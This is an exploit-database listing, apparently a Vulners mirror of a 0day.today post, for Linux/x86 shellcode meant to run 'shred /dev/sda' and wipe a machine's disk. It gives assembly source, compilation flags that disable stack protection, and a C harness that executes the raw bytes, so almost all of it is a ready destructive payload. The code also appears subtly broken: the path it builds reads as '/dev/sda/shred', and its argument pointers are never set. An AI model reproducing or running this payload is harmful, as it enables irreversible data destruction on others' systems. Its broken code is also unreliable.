Lucene search
K

Linux/x86 /dev/sda Partition Wiping Shellcode (35 bytes)

🗓️ 22 Aug 2020 00:00:00Reported by cybersakiType 
zdt
 zdt
🔗 0day.today👁 487 Views

Linux/x86 Shred /dev/sda Partition Wiping Shellcode (35 bytes

Code
# Exploit Title: Linux/x86 - Shred /dev/sda wipe partition Shellcode (35 bytes)
# Google Dork: None
# Exploit Author: cybersaki
# Vendor Homepage: None
# Software Link: None
# Version: None
# Tested on: Kali linux 2020.2a i386 x86
# CVE : none 
# Shellcode-length : 35
# SLAE-id : Purchased | [email protected]

; Description :
; The following shellcode will execute shred /dev/sda to wipe the partitions.

; Shellcode :

section .text

global _start

_start:
  xor eax, eax
  push eax

  push word 0x6465
  push 0x7268732f
  push 0x6164732f
  push 0x7665642f

  mov ebx, esp

_exec:
  push eax
  push ebp
  push edi
  push esi
  push ebx
  mov ecx, esp
  mov al, 0xb

  int 0x80

; Compilation :
; nasm -f elf32 -o filename.o filename.nasm
; ld -z execstack -o filename filename.o
; gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

; Shellcode : 

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x73\x64\x61\x68\x2f\x64\x65\x76\x89\xe3\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80";

int main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation